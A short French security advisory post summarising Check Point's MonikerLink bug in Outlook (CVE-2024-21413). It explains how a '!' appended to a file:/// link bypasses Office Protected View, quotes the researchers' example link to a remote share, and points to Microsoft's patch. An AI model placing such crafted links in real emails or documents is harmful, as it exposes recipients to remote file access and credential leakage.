Le bonne intention - un peu pauvre... :
Les pièces jointes et les liens Microsoft Outlook ne peuvent pas être téléchargés par défaut pour empêcher un exploit (disons une exécution de script malveillant).Une fonctionnalité (bien connue) lecture seule appelée Vue protégée Office.
- Donc, en théorie, un attaquant attend que vous double-cliquiez (mais un avertissement apparaîtra dans la vue protégée d'Office), puis cliquez à nouveau pour déverrouiller la vue protégée d'Office.
- Il y a des années, Microsoft a intentionnellement mis en place une restriction interdisant l'ouverture de liens vers des fichiers distants, sauf autorisation de l'utilisateur.
Les points négatifs :
Alors où est le risque ? La recherche CheckPoint a découvert une vulnérabilité dans Outlook définie comme MonikerLink Bug- La restriction peut être évitée facilement en ajoutant un point d'esclamation (!) dans l'appel d'API : exemple de CheckPoint "file:///\\10.10.111.111\test\test.rtf !".
- Le « ! » Le caractère sera traité comme un appel à un serveur COM (Component Object Model), ainsi (simplifiant) le fichier rtf (un fichier Word) sera accessible, en passant par Office Protected View.
Solutions :
... Corrigez, puis corrigez, et corrigez à nouveau (fix it!!): suivez la mise à jour de sécurité de Microsoft.Crédits : Recherche Check Point
CVE : CVE-2024-21413